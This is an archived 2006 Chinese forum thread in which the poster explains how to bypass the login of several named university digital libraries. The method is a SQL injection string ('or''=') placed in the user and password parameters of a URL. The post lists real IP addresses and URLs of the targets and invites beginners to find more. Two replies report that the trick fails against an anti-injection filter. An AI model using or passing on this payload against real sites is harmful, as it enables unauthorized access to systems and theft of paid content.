版块导航: 正在加载中...

登录注册

应《网络安全法》要求，自2017年10月1日起，未进行实名认证将不得使用互联网跟帖服务。为保障您的帐号能够正常使用，请尽快对帐号进行手机号验证，感谢您的理解与支持！

24小时热门版块排行榜

返回列表

当前主题已经存档。

huihui9467

金虫 (正式写手)

应助: 0 (幼儿园)
金币: 551.5
帖子: 368
在线: 16.9小时
虫号: 94062
注册: 2005-09-25
性别: GG
专业: 植物资源学

[交流] 利用asp漏洞进超星图书馆

这是在看了论坛上的一个帖子后测试找出来的，特向菜鸟们推荐，
希望对大家有所帮助！
深圳广播电视大学数字图书馆
http://218.17.219.22/bookhtm/index.asp
搜索需要输入用户名、MM
我们可以构造查询条件，突破限制
做法如下：
1.随便输入学号、MM，登陆，例如：学号=1,MM=1.这时会出现“此用户不存在！返回”
ie地址栏中地址为：http://218.17.219.22/bookhtm/sq/ ... ;B1.x=31&B1.y=6

2.修改地址进入：
将上面地址中user=1&mima=1改为:user='or''='&mima='or''='
或者user='orƇ'=Ƈ&mima='orƇ'=Ƈ 也可
即：http://218.17.219.22/bookhtm/sq/load.asp?user='or''='&mima='or''='&B1.x=31&B1.y=6
就是登陆地址了。
3.登陆后可以随便看了
同样的道理利用这个漏洞，可以登陆另外几个需要输入用户名、MM的站点,需要输入的地方都输上'or''='
如：驻马店电大：http://www.zmdtvu.net/dabookhtm/
铜陵电大：http://218.22.180.149/index.asp其他的自己好好发掘吧，

回复此楼

» 猜你喜欢

278求调剂已经有3人回复
289求调剂已经有8人回复
303求调剂已经有6人回复
求调剂一志愿本科北科大化学 343 已经有5人回复
271求调剂已经有3人回复
318求调剂已经有3人回复
07化学280分求调剂已经有7人回复
化学调剂已经有6人回复
318求调剂已经有8人回复
0703化学求调剂已经有6人回复

1楼 2006-04-27 20:39:41

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

早起的木虫

木虫 (小有名气)

应助: 0 (幼儿园)
金币: 2464
帖子: 172
在线: 19.1小时
虫号: 174737
注册: 2006-01-22
专业: 牙体牙髓及根尖周组织疾病

楼主试了没？我试了，行不通！

赞一下

回复此楼

2楼2006-04-27 22:13:28

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

fox168110

木虫 (著名写手)

应助: 0 (幼儿园)
金币: 3489
散金: 70
帖子: 2162
在线: 188.6小时
虫号: 237593
注册: 2006-04-04
性别: GG
专业: 凝聚态物性I:结构、力学和

不可以
防注入系统提示……
没有用

赞一下

回复此楼

3楼2006-04-27 22:50:17

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

相关版块跳转我要订阅楼主 huihui9467 的主题更新

返回列表

最具人气热帖推荐 [查看全部]		作者	回/看	最后发表

[考研] 材料调剂 +6	匹克i 2026-03-23	6/300	2026-03-24 21:09 by greychen00
[考研] 材料学硕333求调剂 +3	北道巷 2026-03-24	3/150	2026-03-24 19:17 by pswait
[考研] 收08调剂生 +6	komorebi69 2026-03-18	6/300	2026-03-24 19:09 by 汪！？！
[考研] 材料专硕331求调剂 +4	鲜当牛 2026-03-24	4/200	2026-03-24 15:58 by JourneyLucky
[考研] 一志愿华东理工大学081700，初试分数271 +5	kotoko_ik 2026-03-23	6/300	2026-03-24 10:29 by 学术搬砖er
[考研] 一志愿武理材料工程348求调剂 +6	￣^￣゜汗 2026-03-19	9/450	2026-03-23 19:53 by pswait
[考研] 336求调剂 +4	收到VS 2026-03-20	4/200	2026-03-23 19:02 by macy2011
[论文投稿] 急发核心期刊论文 +3	贤达问津 2026-03-23	5/250	2026-03-23 17:13 by 妹子不好惹
[考研] 291 求调剂 +4	化工2026届毕业� 2026-03-21	5/250	2026-03-23 16:46 by 化工2026届毕业�
[考研] 280分求调剂一志愿085802 +4	PUMPT 2026-03-22	7/350	2026-03-22 22:13 by 星空星月
[考研] 311求调剂 +6	冬十三 2026-03-18	6/300	2026-03-22 20:18 by edmund7
[考研] 一志愿中南化学（0703）总分337求调剂 +9	niko- 2026-03-19	10/500	2026-03-22 16:08 by ColorlessPI
[考研] 求调剂院校信息 +6	CX 330 2026-03-21	6/300	2026-03-22 15:25 by 无懈可击111
[考研] 260求调剂 +3	朱芷琳 2026-03-20	4/200	2026-03-22 15:12 by 朱芷琳
[考研] 297求调剂 +3	喜欢还是不甘心 2026-03-20	3/150	2026-03-21 18:33 by 学员8dgXkO
[考研] 307求调剂 +3	余意卿 2026-03-18	3/150	2026-03-21 17:31 by ColorlessPI
[考研] 0805材料320求调剂 +3	深海物语 2026-03-20	3/150	2026-03-21 15:46 by 无际的草原
[考研] 一志愿西北大学，070300化学学硕，总分287，双非一本，求调剂。 +3	晨昏线与星海 2026-03-18	3/150	2026-03-21 00:46 by JourneyLucky
[考研] 一志愿中海洋材料工程专硕330分求调剂 +8	小材化本科 2026-03-18	8/400	2026-03-20 23:16 by JourneyLucky
[考研] 295复试调剂 +8	简木ChuFront 2026-03-19	8/400	2026-03-20 20:44 by zhukairuo